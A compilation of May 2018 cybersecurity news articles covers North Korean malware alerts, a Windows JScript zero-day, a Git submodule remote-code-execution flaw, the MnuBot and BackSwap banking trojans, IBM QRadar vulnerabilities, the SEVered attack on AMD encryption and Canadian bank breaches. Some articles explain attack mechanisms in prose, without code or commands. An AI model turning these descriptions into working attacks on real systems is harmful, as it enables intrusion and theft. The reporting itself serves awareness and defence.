US-CERT issued an alert on two malware associated with North Korea-linked APT Hidden Cobra
30.5.2018 securityaffairs APT  

The Department of Homeland Security (DHS) and the FBI issued a joint Technical alert on two strain on malware, the Joanap backdoor Trojan and Brambul Server Message Block worm, associated with the HIDDEN COBRA North Korea-linked APT group.

The US-CERT alert reads:

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with two families of malware used by the North Korean government:

a remote access tool (RAT), commonly known as Joanap; and
a Server Message Block (SMB) worm, commonly known as Brambul.”
“The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.”

Hidden Cobra

The government experts have identified a range of IP addresses and other indicators of compromise (IOCs) associated with the two families of malware.

The first threat tracked as “Joanap” is a two-stage RAT that uses peer-to-peer communications to manage botnets and perform malicious activities such as data exfiltration, installation of further payloads and establish proxy communications on compromised Windows systems.

“Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.” states the alert.

The second malware analyzed by the government researchers is a Windows 32-bit Server Message Block (SMB) worm called “Brambul”.

Brambul is used as a service dynamic link library file or a portable executable file often dropped and installed onto target networks by dropper malware.

“When executed, the malware attempts to establish contact with victim systems and IP addresses on victims’ local subnets. If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.” states the ransomware.

Network administrators could use the IOCs included in the alert to detect both Joanap and Brambul malware and prevent infections.


Expert found a zero-day RCE in Microsoft Windows JScript component
30.5.2018 securityaffairs
Vulnerebility  

Dmitri Kaslov, a security researcher at Telspace Systems, discovered a vulnerability in the JScript component of the Windows operating system that can be exploited by an attacker to execute malicious code on a target computer.
Kaslov disclosed the zero-day flaw through the Trend Micro Zero-Day Initiative (ZDI) back in January, then ZDI experts reported it to Microsoft.

After four months Microsoft has yet to roll out a patch to address the flaw so ZDI decided to publish a part of the technical analysis of the vulnerability.

ZDI usually waits 120 days before publicly disclose a flaw.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” reads the advisory published by ZDI.

“The specific flaw exists within the handling of Error objects in JScript. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.”

The vulnerability received a 6.8 rating out of 10 on the CVSSv2 severity scale.

Microsoft Windows JScript component

To exploit the vulnerability, the attacker has to trick victims into accessing a malicious web page, or download and open a malicious JS file on the system.

The good news is that the vulnerability does not allow a full system compromise because attackers can execute malicious code only within a sandboxed environment.

Of course, an attacker can chain this vulnerability with a sandbox bypass exploit and then execute its own code on the target system.

Anyway, Microsoft is working on a security update

Below the timeline for the vulnerability:

01/23/18 – ZDI sent the vulnerability report to the vendor
01/23/18 – The vendor acknowledged and provided a case number
04/23/18 – The vendor replied that they were having difficulty reproducing the issue report without POC
04/24/18 – ZDI confirmed the POC was sent with the original and sent it again
05/01/18 – The vendor acknowledged receipt of the POC
05/08/18 – The vendor requested an extension
05/18/18 – ZDI replied “We have verified that we sent the POC with the original. The report will 0-day on May 29.”

ZDI confirmed that it is was not aware of attempts in the wild to exploit this vulnerability.


FireMon to Acquire Cyber Situational Awareness Firm Lumeta
30.5.2018 securityweek IT 

Network security policy management solutions provider FireMon announced on Tuesday that it has entered an agreement to acquire Lumeta, a company that specializes in cyber situational awareness.

The financial terms of the deal, expected to be completed in the second quarter of 2018, have not been disclosed.

Lumeta’s products provide organizations real-time network and device visibility and security monitoring, including for IoT and industrial control systems (ICS). The company also helps customers identify and remediate leak paths and segmentation violations.

Lumeta technology can continuously identify new devices and cloud connectivity, allowing FireMon to extend the capabilities of its own platform to previously unknown network and cloud elements. This should help reduce attack surface and expose activity that may represent a security risk, FireMon said.

“Lumeta and FireMon share a vision for deeper integration across the security industry. For example, Lumeta built Spectre with two-way RESTful APIs, which has resulted in proven integrations with leading security vendors, including McAfee ePO, IBM QRadar, Carbon Black, Cisco, Tenable, InfoBlox and Qualys. This pairs well with FireMon’s vendor-agnostic approach to solving customers’ problems,” said Satin Mirchandani, CEO of FireMon. “Additionally, Lumeta’s history, which dates back to the legendary innovation center Bell Labs, perfectly complements FireMon’s business model and technology strategy.”

FireMon says Lumeta will remain a standalone business, and its current president, Reggie Best, will continue to fill the position. FireMon also plans on investing into the development of Lumeta’s technology and integration with its own products.

Lumeta is not the first company acquired by FireMon. It bought Immediate Insight in 2015 and in 2016 it acquired cloud security firm FortyCloud.


Remote Code Execution Vulnerability Patched in Git
30.5.2018 securityweek 
Vulnerebility 

Updates released on Tuesday for the Git version control system patch two security flaws, including a serious vulnerability that can be exploited for remote code execution using specially crafted repositories.

The security holes, tracked as CVE 2018-11235 and CVE 2018-11233, have been addressed with the release of Git v2.17.1, v2.13.7, v2.14.4, v2.15.2 and v2.16.4.

The more serious of them, CVE 2018-11235, is related to submodule names and recursively cloning repositories. The issue was discovered by Etienne Stalmans, who reported it through GitHub’s bug bounty program.

Microsoft’s Visual Studio Team Services (VSTS) team has provided some information about the vulnerability, instructions on how users can check if they are impacted, and the steps that need to be taken to mitigate the risks on each platform.

Edward Thomson, a program manager for Git in the Microsoft Visual Studio Team Service, has provided the following description for the vulnerability:

“When a Git repository contains a submodule, that submodule's repository structure is stored alongside the parent's, inside the .git folder. This structure is generally stored in a folder with the same name as the submodule, however the name of this folder is configurable by a file in the parent repository.

Vulnerable versions of git allow the folder name to contain a path that is not necessarily beneath the .git directory. This can allow an attacker to carefully create a parent repository that has another Git repository checked in, as a folder inside that parent repository. Then that repository that's checked in can be added as a submodule to the parent repository. That submodule's location can be set outside of the .git folder, pointing to the checked-in repository inside the parent itself.

When you recursively clone this parent repository, Git will look at the submodule that has been configured, then look for where to store that submodule's repository. It will follow the configuration into the parent repository itself, to the repository that's been checked in as a folder. That repository will be used to check out the submodule… and, unfortunately, any hooks in that checked-in repository will be run.

So the attacker can bundle this repository configuration with a malicious post-checkout hook, and their code will be executed immediately upon your (recursive) clone of the repository.”

Microsoft, GitLab, GitHub and likely other Git hosting providers have taken steps to prevent abuse. However, users have still been advised to update their Git clients.

The second flaw is considered less serious. The issue is related to Git performing “path sanity-checks on NTFS that can be fooled into reading arbitrary memory.”


Vulcan Cyber Emerges From Stealth With $4 Million Seed Round
30.5.2018 securityweek IT 

Vulcan Cyber is the latest Israel-based cybersecurity startup to emerge from stealth mode. The company, whose main product is a vulnerability remediation platform, announced on Wednesday that it raised $4 million in seed funding.

The funding round was led by YL Ventures with participation from other investors. Vulcan Cyber will use the seed funds to build its Israeli R&D office, which will develop and deliver its product, and kickstart operations in the U.S., with a focus on sales, marketing, support and professional services.

A beta version of the platform is already available to qualified customers and is expected to become generally available in late 2018.Vulcan Cyber emerges from stealth

Studies have shown that it can take organizations a long time to patch vulnerabilities in the software they use and it’s not uncommon for known flaws to be exploited in high profile attacks that end up costing companies millions of dollars.

Vulcan cyber aims to address the vulnerability remediation gap by providing a platform that integrates with existing security assessment, DevOps and IT tools, allowing organizations to detect vulnerabilities and automate the remediation process. The list includes tools from AWS, Nessus, WhiteHat, Qualys, IBM, BlackDuck, Tripwire, Checkmarx, Rapid7, Veracode, Google, Microsoft, GitHub, Slack and many others.

The solution provides an orchestration engine that helps coordinate the teams, tasks and tools needed to address vulnerabilities, the company says.

Vulcan says its goal is to build the largest vulnerability remediation database, including patches, automated scripts and signatures.

The company claims that unlike competitors, whose products assess and prioritize flaws strictly based on threat intelligence, its platform also leverages DevOps and IT data.

The product is aimed at CIOs and CISOs who want to get a clear picture of the risk level across their organization, and individuals responsible for vulnerability management programs, as it allows them to better manage the remediation process and improve efficiency by automating certain tasks.

Vulcan says its cloud-based platform is easy to deploy – it does not require any agents or tapping into network traffic, and organizations only need to provide the API and credentials for their vulnerability assessment, DevOps and IT tools.


Chrome 67 Patches 34 Vulnerabilities
30.5.2018 securityweek 
Vulnerebility 

Google this week released Chrome 67 to the stable channel to provide various improvements, including patches for 34 vulnerabilities.

After introducing it in Chrome 63 in December, Google is now making Site Isolation available for more users. The functionality ensures that each opened website is rendered in a separate process, thus isolating it from the processes of other websites and delivering stronger security boundaries.

Chrome’s Site Isolation was also meant as a form of mitigation against the web-exploitable Spectre vulnerability affecting modern micro-processors. Since the beginning of the year, together with Meltdown, another CPU flaw, Spectre has fueled an industry-wide race to release patches and mitigations.

“We're continuing to roll out Site Isolation to a larger percentage of the stable population in Chrome 67. Site Isolation improves Chrome's security and helps mitigate the risks posed by Spectre,” Google notes in a blog post.

Of the 34 security fixes delivered in the new browser release, 24 are for vulnerabilities reported by external researchers. These include 9 flaws rated High severity, 12 assessed with a Medium risk, and 3 considered Low severity.

The most important issues addressed in Chrome 67 include Use after free in Blink (CVE-2018-6123), Type confusion in Blink (CVE-2018-6124), Overly permissive policy in WebUSB (CVE-2018-6125), Heap buffer overflow in Skia (CVE-2018-6126), Use after free in indexedDB (CVE-2018-6127), uXSS in Chrome on iOS (CVE-2018-6128), Out of bounds memory access in WebRTC (CVE-2018-6129 and CVE-2018-6130), and Incorrect mutability protection in WebAssembly (CVE-2018-6131).

The Medium severity bugs addressed in this release include Use of uninitialized memory in WebRTC, URL spoof in Omnibox, Referrer Policy bypass in Blink, UI spoofing in Blink, Out of bounds memory access in V8, Leak of visited status of page in Blink, Overly permissive policy in Extensions, Restrictions bypass in the debugger extension API, Heap buffer overflow in Skia, and Out of bounds memory access in V8.

Google also addressed Out of bounds memory access in PDFium, Incorrect escaping of MathML in Blink, and Password fields not taking advantage of OS protections in Views.

The search engine giant paid over $30,000 in bug bounties to the reporting security researchers. However, the company has yet to publish full details on the rewards.


U.S. Commerce Chief Warns of Disruption From EU Privacy Rules
30.5.2018 securityweek Privacy 

Washington - US Commerce Secretary Wilbur Ross warned Wednesday that the new EU privacy rules in effect since last week could lead to serious problems for business, medical research and law enforcement on both sides of the Atlantic.

Ross said US officials were "deeply concerned" about how the General Data Protection Regulation would be implemented, while noting that the guidance so far has been "too vague."

The law which took effect May 25 establishes the key principle that individuals must explicitly grant permission for their data to be used, and give consumers a right to know who is accessing their information and what it will be used for.

Some US officials have expressed concerns about the GDPR, but Ross is the highest ranking official to speak on the law, and his comments address a broad range of sectors that could be affected.

Related Reading: The GDPR Opportunity

"We do not have a clear understanding of what is required to comply. That could disrupt transatlantic cooperation on financial regulation, medical research, emergency management coordination, and important commerce," Ross said in an opinion piece for the Financial Times.

The costs of the new law could be significant, to the point where it may "threaten public welfare on both sides of the Atlantic," according to Ross.

"Complying with GDPR will exact a significant cost, particularly for small and medium-sized enterprises and consumers who rely on digital services and may lose access and choice as a result of the guidelines," he wrote.

"Pharmaceutical companies may not be able to submit medical data from drug trials involving European patients to US authorities, which could delay the approval of new life-saving drugs."

He added that the US Postal Service has claimed the new rules could prevent EU postal operators from providing the data needed to process inbound mail.

Ross also echoed concerns from other officials that EU requirement that personal data be restricted from the internet address book known as "WHOIS" could hurt law enforcement efforts to crack down on cybercrime and online calls to violence.

"That could stop law enforcement from ascertaining who is behind websites that propagate terrorist information, sponsor malicious botnets or steal IP addresses," he said.

"These important activities need to be weighed carefully against privacy concerns. They are critical to building trust in the internet, safeguarding infrastructure, and protecting the public. Our respect for privacy does not have to come at the expense of public safety.


U.S. Attributes Two More Malware Families to North Korea
30.5.2018 securityweek 
Virus 

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have issued another joint technical alert on the North Korea-linked threat group known as Hidden Cobra.

The latest alert attributes the Joanap backdoor trojan and the Brambul worm to the North Korean government. It provides IP addresses and other indicators of compromise (IoC) associated with these threats in an effort to help organizations protect their networks against attacks.

The threat actor tracked by the U.S. government as Hidden Cobra is known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including ones targeting Sony Pictures, Bangladesh’s central bank and various financial organizations. Some of the group’s campaigns are tracked as Operation Blockbuster, Dark Seoul and Operation Troy. Five Eyes countries have also officially blamed Lazarus for the WannaCry attack.US government shares details on Joanap and Brambul malware used by North Korea

According to the DHS and FBI, Joanap and Brambul have been used by Hidden Cobra since at least 2009 in attacks aimed at organizations in the United States and elsewhere, including in the media, financial, aerospace and critical infrastructure sectors.

Joanap is a two-stage malware that allows hackers to exfiltrate data and install other threats on the system.

Brambul is a worm that abuses the Server Message Block (SMB) protocol to spread to other systems through dictionary attacks. Its list of capabilities also includes harvesting system information (which it sends to the attackers via email), accepting command-line arguments, and executing what analysts call a “suicide script.”

The DHS and the FBI have published several alerts in the past year describing Hidden Cobra tools, including Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

North Korea has been blamed for several major attacks, but Pyongyang has always denied the accusations. On the other hand, threat actors linked to North Korea don’t seem to be deterred by accusations and the numerous reports published in the past years by cybersecurity companies, and they continue launching attacks, including with new tools and zero-day exploits.


Open Source Tool From FireEye Helps Detect Malicious Logins
30.5.2018 securityweek 
Virus

FireEye has released GeoLogonalyzer, an open source tool that can help organizations detect malicious logins based on geolocation and other data.

Many organizations need to allow their employees to connect to enterprise systems from anywhere in the world. However, threat actors often rely on stolen credentials to access a targeted company’s systems.

Identifying legitimate logins and malicious ones can be challenging, but FireEye hopes to solve the problem with its GeoLogonalyzer, which leverages what the company calls GeoFeasibility.

GeoLogonalyzer analyzes authentication logs containing timestamps, usernames, and IP addresses, and highlights any changes, including related to anomalies, data center hosting information, location data, ASN information, and time and distance metrics.

GeoFeasibility looks at the location of the user who initiated a login in an effort to determine if the login is suspicious or not. For example, if a user connects to a company VPN from the United States, they are unlikely to connect to the VPN from Australia a few minutes later.

In addition to checking if accounts authenticate from two distant geographical locations in a short timeframe, GeoLogonalyzer looks at accounts that usually log in from IP addresses registered to one physical location, but also authenticate from places where the user is unlikely to be.

Logins from a foreign location where no employees reside or are expected to travel to, and where the organization does not have any business contacts will also raise a red flag.

Less obvious login patterns may also be considered suspicious, including user accounts that typically log in from one IP address, subnet or ASN, but also have a small number of logins from a different source, or ones that log in from IP addresses registered to cloud server hosting providers. Users who log in from multiple source hostnames or with multiple VPN clients are also considered suspicious.

Additional information and usage instructions are available on GitHub and FireEye’s blog post.


Europol Creates Dark Web Investigations Team
30.5.2018 securityweek BigBrothers

The European Union’s law enforcement agency today announced the creation of a dedicated team that will be investigating activity across the dark web.

The newly established Dark Web Investigations Team, embedded within Europol’s European Cybercrime Centre (EC3), is the result of a Europol initiative “to create a coordinated law enforcement approach to tackle crime on the dark web.”

The dedicated team will have participation from EU law enforcement agencies, operational third parties, and other relevant partners.

Through EC3, Europol has been long supporting investigations of criminal marketplaces on the dark web, and helped last year with the takedown of some of the largest dark web markets, such as AlphaBay.

Many critical marketplaces for criminal organizations and individual illegal activities worldwide are hosted on the dark web, the law enforcement agency points out. Such underground markets represent fertile environments for criminals, as they offer the possibility to buy and sell anonymously.

Shut down last year, Alphabay and Hansa, two of the largest underground marketplaces, were reportedly responsible for the trading of over 350,000 illicit goods, including drugs, firearms and cybercrime tools, such as malware.

The successful takedown of these dark web portals resulted in a decreased volume of transactions and in some traders leaving the dark web platform due to anxiety, uncertainty, and the risks regarding the level of anonymity, Europol notes. Many vendors “were not inclined to open them again,” and the distrust between vendors and buyers has increased.

The newly established dedicated Dark Web Team “will deliver a complete, coordinated approach: sharing information, providing operational support and expertise in different crime areas and the development of tools, tactics, and techniques to conduct dark web investigations and identify top threats and targets. The team also aims to enhance joint technical and investigative actions, organize training and capacity-building initiatives, together with prevention and awareness-raising campaigns – a 360° strategy against criminality on the dark web,” Europol says.


Accused Yahoo Hacker Gets Five Years in Prison, Fine
30.5.2018 securityweek Crime

A man accused of taking part in devastating cyberattacks on Yahoo for Russian intelligence agents was sentenced Tuesday to five years in prison in a plea bargain with prosecutors.

The deal struck by 23-year-old Karim Baratov, who immigrated to Canada from Kazakhstan, also resulted in a fine that "encompasses all his remaining assets," the US Justice Department said in a statement.

Baratov has been in American custody since being extradited from Canada last year on a US warrant for hacking, commercial espionage and related crimes.

US authorities allege Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.

The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history.

"The sentence imposed reflects the seriousness of hacking for hire," said prosecutor Alex Tse.

"Hackers such as Baratov ply their trade without regard for the criminal objectives of the people who hire and pay them."

Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.

"It's difficult to overstate the unprecedented nature of this conspiracy, in which members of a foreign intelligence service directed and empowered criminal hackers to conduct a massive cyber-attack against 500 million victim user accounts," said John Bennett, FBI special agent in charge for the San Francisco field office.


At least 90,000 Canadian bank customers may have been affected by two data breach
30.5.2018 securityaffairs Incindent  

On Monday, Two Canada’s five largest banks, the Bank of Montreal (BMO) and Simplii Financial, informed their customers they are investigating a data breach.
The security breach suffered by the Bank of Montreal (BMO) may have impacted less than 50,000 of the overall 8 million customers, the incident suffered by Simplii Financial may have exposed information of 40,000 clients.

“Two Canadian banks warned Monday they have been targeted by hackers, and that the personal information of tens of thousands of customers may have been stolen — something that appeared to be confirmed in a letter to the media from someone who said they were demanding a $1-million ransom from the banks.” reads the post published by CBC.

“CIBC-owned Simplii Financial was the first to warn on Monday morning that hackers had accessed the personal and account information of more than 40,000 of the bank’s customers.”

Exposed data allegedly includes social insurance numbers, dates of birth, and financial information.

Canadian Banks data breach

In both cases, hackers contacted the bank trying to blackmail them and requested a $1 million ransom from each bank to avoid data disclosure.

BMO excluded the involvement of insiders, it has contacted authorities and notified the incident to potentially affected customers.

“On Sunday, May 27, fraudsters contacted BMO claiming that they were in possession of certain personal and financial information for a limited number of customers. We believe they originated the attack from outside the country.” reads a press release published by BMO.

“We took steps immediately when the incident occurred and we are confident that exposures identified related to customer data have been closed off. We have notified and are working with relevant authorities as we continue to assess the situation.”

Simplii has not yet confirmed the data breach but informed customers that it’s investigating the issue and has already implemented “enhanced online fraud monitoring and online banking security measures.”

“Simplii Financial is advising clients that it has implemented additional online security measures in response to a claim received on Sunday, May 27, 2018 that fraudsters may have electronically accessed certain personal and account information for approximately 40,000 of Simplii’s clients.” states the security advisory published by the bank.

“We’re taking this claim seriously and have taken action to further enhance our monitoring and security procedures,” said Michael Martin, Senior Vice-President, Simplii Financial. “We feel that it is important to inform clients so that they can also take additional steps to safeguard their information.”

The bank has reassured its customers that any economic damage will be fully reimbursed.

In addition, Simplii recommends that clients:

Always use a complex password and pin (e.g. not 12345)
Monitor their accounts for signs of unusual activity
At the time, we cannot exclude that hackers were able to obtain customer data of the two Canadian Banks in other ways, for example collecting them from other data breaches or by targeting customers with spear phishing campaign.


New Banking Trojan MnuBot uses SQL Server for Command and Control
30.5.2018 securityaffairs 
Virus

Researchers at IBM X-Force Research team discovered a new Delphi-based banking Trojan dubbed MnuBot that leverages Microsoft SQL Server for communication with the command and control (C&C).
The MnuBot Trojan implements a two-stage attack flow, it is composed of two main components that are tasked for the two stages.

In the first stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder.

If the file is not present, MnuBot creates it, creates a new desktop and switches the user workspace to that newly created desktop that runs side by side to the legitimate user desktop.

MnuBot continually checks the foreground window name in the new desktop searching for bank names in its configuration, then it will query the server for the second stage executable according to the specific bank name that was found.

The MnuBot implements the following capabilities:

Creating browser and desktop screenshots
Keylogging
Simulating user clicks and keystrokes
Restarting the victim machine
Uninstalling Trusteer Rapport from the system
Creating a form to overlay the bank’s forms and steal the data the user enters into the form
The malware downloads the malicious payload in as C:\Users\Public\Neon.exe, this binary contains the attack logic.

“the MnuBot malware uses a Microsoft SQL Server database server to communicate with the sample and send commands to be executed on the infected machine.” read the report published by IBM.

“Like any other RAT, MnuBot needs to receive commands from the server. To do so, it constantly queries the Microsoft SQL database server for a new command.”

Once the malware has infected the systems, it connects the C&C server to fetch the initial configuration. Experts found SQL server details (server address, port, username, and password) hardcoded inside the malware in an encrypted form.

mnubot

The configuration also includes:

Queries to be performed
Commands the malicious actor can send
Files MnuBot will interact with
Bank websites that are being targeted
If the MnuBot malware is not able to access the configuration file it will shut itself down and does not perform any malicious activity on the infected machine.

The MnuBot uses the configuration to dynamically change the malicious activity (e.g., the banking sites that are targeted) and implement anti-research mechanisms.

Every time the attacker wants to send commands to the malware he updates specific columns inside a table stored in a database named jackjhonson.

“The attacker sends commands to the victims by updating specific columns inside a table called USUARIOCONTROLEXGORDO, which is stored in a database named jackjhonson.” continues analysis.

“A few interesting columns include the following:

COMP_ ACAO: This column identifies the type of command to be executed.
POSICAOMOUSE: In case the command is to simulate a user click, this column will be updated with the cursor position.
USER_IMAGEM: This column will be updated with the screenshot BMP image from the infected machine in case a screenshot was requested.
VALORINPUT: This column contains the input in case the command was input insertion.”
Like other malware families, MnuBot implements a full-screen overlay form to display victims overlaying forms used to trick them into providing sensitive data.

“Those forms are a type of social engineering to keep the user waiting. In the background, the cybercriminal takes control over the user endpoint and attempts to perform an illegal transaction via the victim’s open banking session.” concludes the report.

“MnuBot is an excellent example of many malware families in the Brazilian region. It holds many characteristics that are typical of other recently discovered malware strains. For example, the overlaying forms and the new desktop creation are well-known techniques that malware authors in the region use today.”


New Trojan Uses SQL Server for C&C
29.5.2018 securityweek
Virus

A recently discovered banking Trojan leverages Microsoft SQL Server for communication with the command and control (C&C), IBM has discovered.

Dubbed MnuBot, the malware uses the database server for communication with the bot and to send commands to the infected machines. The Trojan features two components, each in charge of a different phase of a two-stage attack flow.

During the initial stage, the malware searches for a file called Desk.txt within the %AppData%Roaming folder. This file lets MnuBot know which desktop is currently running and, if it exists, the Trojan does nothing, because it knows it runs in a new desktop.

If the file doesn’t exist, then MnuBot creates it and a new desktop, and then switches the user workspace to the new desktop, which runs alongside the legitimate user desktop.

On the newly created desktop, MnuBot constantly checks the foreground window name and, if it finds a name similar to a bank name in its configuration, the malware queries the server for the second stage executable corresponding to that bank name.

The executable, which is saved as C:\Users\Public\Neon.exe, is actually a Remote Access Trojan (RAT) that provides the attacker with full control over the target machine. It also includes functionality unique to MnuBot, IMB explains.

Once the infection stage has been completed, the malware connects to the C&C server to fetch the initial configuration. The necessary SQL server details, such as server address, port, username and password, are hardcoded inside the malware in an encrypted form (they are decrypted dynamically just before initializing the connection).

Strings in the configuration include queries the malware should perform, supported commands, files to interact with, and targeted bank websites. Should the configuration be missing, MnuBot shuts itself down, meaning no malicious activity is performed on the infected machine.

The attackers can dynamically change MnuBot’s malicious activity by modifying the configuration directly on the server, and can also prevent researchers from reverse engineering the malware sample behavior if the author takes the server down.

Once the user opens the webpage of a targeted website, the second-stage payload provides the malware operator with an open session to the bank’s website, directly from the victim machine.

The malware provides the operator with the ability to create browser and desktop screenshots, log keystrokes, simulate user clicks and keystrokes, restart the victim machine, uninstall Trusteer Rapport from the system, create a form to overlay the bank’s page and steal the data the user enters there.

To send commands to the victim machine, the attacker updates specific columns inside a table stored in a database named jackjhonson. Columns there are meant to identify the type of command to be executed, to simulate a user click, to store screenshot bmp images from the infected machines in case a screenshot is needed, and to store the input required for input insertion commands.

MnuBot uses a full screen overlay form to prevent users from accessing the legitimate banking website and to trick them into revealing sensitive data. In the background, the malware operator takes control over the system and attempts to perform an illegal transaction via the already opened banking session.

The operator also asks the user for additional details if needed, using another overlaying form. The executable downloaded during the second stage of the attack contains the relevant social engineering forms the cybercriminals need for their nefarious operations.

MnuBot, which was observed targeting users in Brazil, is a great example of how malware authors constantly attempt to evolve their creations to evade regular anti-virus detection. In this case, they attempted to hide malicious network communications using seemingly innocent MS SQL traffic.


Flaws in IBM QRadar Allow Remote Command Execution
29.5.2018 securityweek
Vulnerebility 

Three vulnerabilities discovered by a researcher in IBM’s QRadar product can be chained for an exploit that allows a remote and unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

IBM QRadar is an enterprise security information and event management (SIEM) product designed to help security analysts identify sophisticated threats on their network and improve incident remediation.

Independent researcher Pedro Ribeiro discovered that IBM QRadar is affected by three potentially serious vulnerabilities, which he reported to the tech giant through Beyond Security’s SecuriTeam Secure Disclosure program.

According to IBM, the security holes impact QRadar SIEM 7.3.0 to 7.3.1 Patch 2, and QRadar SIEM 7.2.0 to 7.2.8 Patch 11. Patches are included in versions 7.3.1 Patch 3 and 7.2.8 Patch 12.

IBM has assigned a CVSS score of only 5.6 to the vulnerabilities, which it collectively tracks as CVE-2018-1418. However, the issues seem serious and an advisory in NIST’s National Vulnerability Database (NVD) shows a score of 9.8, which indicates a “critical” severity rating.

According to Beyond Security, QRadar has a built-in application for performing forensic analysis on files. While the application is disabled in the Community Edition, the code is there and part of it still works.

The application has two components: a Java servlet and the main component, which uses PHP. The first component is affected by a vulnerability that can be exploited to bypass authentication, while the second has a flaw that can be leveraged to download and execute a shell.

The flaw affecting the PHP component requires authentication, but that can be achieved by exploiting the first vulnerability. Chaining these vulnerabilities allows a remote attacker to execute arbitrary commands on the system, but only with low privileges (i.e. “nobody” user). However, Ribeiro discovered a third vulnerability that can be exploited to escalate privileges from “nobody” to root.

Beyond Security has made available technical details and proof-of-concept (PoC) code for these security holes.

Ribeiro has found many serious vulnerabilities in the past years, including in products from Netgear, NUUO, Asus, Kaseya and BMC.


Attack Bypasses AMD's Virtual Machine Encryption
29.5.2018 securityweek Attack 

A group of German researchers has devised a new attack method capable of bypassing AMD’s Secure Encrypted Virtualization (SEV).

Used by AMD data-center processors, SEV is a hardware feature that provides secure encryption of virtual machines (VMs) to protect VM memory from physical attacks and cross-VM and hypervisor-based attacks.

In a whitepaper (PDF), Fraunhofer AISEC researchers present an attack carried out from a malicious hypervisor and capable of “extracting the full contents of main memory in plaintext from SEV-encrypted virtual machines.” Named SEVered, the attack requires a remote communication service running in the VM.

The researchers say their attack can be used to extract all memory contents, even if the targeted VM is under high load. SEVered’s effectiveness was tested on a recent AMD SEV-enabled server platform running various services, in encrypted virtual machines.

SEV can transparently encrypt individual VMs using a Secure Processor (SP), where an individual key is used to encrypt the memory of each protected VM within the SP. The implementation in hardware is meant to protect the system against memory attacks, while also preventing hypervisors (HVs) from accessing sensitive VM data.

“With SEVered, we demonstrate that it is nevertheless possible for a malicious HV to extract all memory of an SEV-encrypted VM in plaintext. We base SEVered on the observation that the page-wise encryption of main memory lacks integrity protection,” the researchers note.

The HV, the whitepaper reads, is responsible for maintaining the VM’s Guest Physical Address (GPA) to Host Physical Address (HPA) mapping in main memory, which allows an attacker in control of the HV to change the memory layout of the VM in the HV.

“We use this capability to trick a service in the VM, such as a web server, into returning arbitrary pages of the VM in plaintext upon the request of a resource from outside,” the researchers explain.

For that, they first identify the encrypted pages in memory corresponding to the resource, then repeatedly send requests “for the same resource to the service while re-mapping the identified memory pages,” which results in extracting all the VM’s memory in plaintext.

“SEVered neither requires detailed knowledge of the target VM or service, nor a malicious process colluding from inside the VM. Our attack is also resistant to noise, i.e., concurrent activity in the target VM, and dynamically adapts to different noise levels,” the paper reads.

The researchers claim SEVered is feasible in practice and could allow an attacker to extract the entire memory from a SEV-protected VM within reasonable time. They also say that the attack manages critical aspects such as noise during the identification and the resource stickiness well, but note that there is room for improvements.

Software-based countermeasures, the researchers say, are insufficient to prevent the attack. The issue could be solved by providing “a full-featured integrity and freshness protection of guest-pages additional to the encryption.” However, the researchers agree that such a solution would incur a high silicon cost to protect full VMs.

“A low-cost efficient solution could be to securely combine the hash of the page’s content with the guest-assigned GPA. This ensures that pages cannot easily be swapped by changing the GPA to HPA mapping. Adding a nonce additionally ensures that an old page for the GPA cannot be replayed into the guest by a malicious HV. Integration of such an approach into AMD SEV could effectively prevent remapping,” the paper reads.

According to the researchers, not even AMD's SEV with Encrypted State (SEV-ES) would be immune to SEVered, as the attack does not require access to any VM state encrypted by SEV-ES.


Major Canadian Banks Investigating Data Breach Claims
29.5.2018 securityweek Incindent 

Two major Canadian banks informed customers on Monday that they launched an investigation after hackers claimed to have obtained personal and account information as a result of a data breach.

The targeted organizations are the Bank of Montreal (BMO) and Simplii Financial, the direct banking brand of the Canadian Imperial Bank of Commerce (CIBC). Both BMO and CIBC are among Canada’s five largest banks.

BMO believes the incident impacts less than 50,000 of its 8 million customers, and Simplii Financial says hackers may have obtained information on roughly 40,000 clients.

Both banks were contacted by hackers on Sunday. Individuals claiming to be behind the attacks told Canadian media outlets they had demanded a $1 million ransom from each bank. If the organizations refuse to pay, the information, which allegedly includes social insurance numbers, dates of birth, and financial information, would be sold to fraudsters.

BMO, which believes the attack originated from outside the country, says it has contacted authorities and potentially impacted customers.

While neither of the banks have confirmed suffering a data breach, BMO says it’s “confident that exposures identified related to customer data have been closed off.” Simplii says it’s taking the claim seriously and it has quickly implemented “enhanced online fraud monitoring and online banking security measures.”

Simplii has found no evidence that customers who bank through CIBC directly are impacted. “If a client is a victim of fraud because of this issue, we will return 100% of the money lost from the affected bank account,” the company stated.

While hackers may have gained access to the systems of Simplii and BMO, overblown claims are not uncommon in extortion schemes. There is also the possibility that the data is legitimate, but was obtained by cybercriminals through other means, such as phishing, rather than by directly breaching the banks.

On the other hand, hackers breaching the systems of banks is not unheard of. Financial organizations in the United States, Mexico, India, Russia, and Taiwan were targeted recently in sophisticated cyberattacks and had either millions of dollars or sensitive customer information stolen.


BackSwap Trojan Uses New Browser Monitoring and Injection Techniques
29.5.2018 securityweek
Virus 

A newly discovered banking Trojan uses innovative techniques to detect when a bank’s website is accessed and to inject malicious code into targeted pages, ESET warns.

Dubbed BackSwap, the malware no longer relies on complex process injection methods to keep track of browsing activity, but hooks key window message loop events instead.

“This is a seemingly simple trick that nevertheless defeats advanced browser protection mechanisms against complex attacks,” the security firm explains.

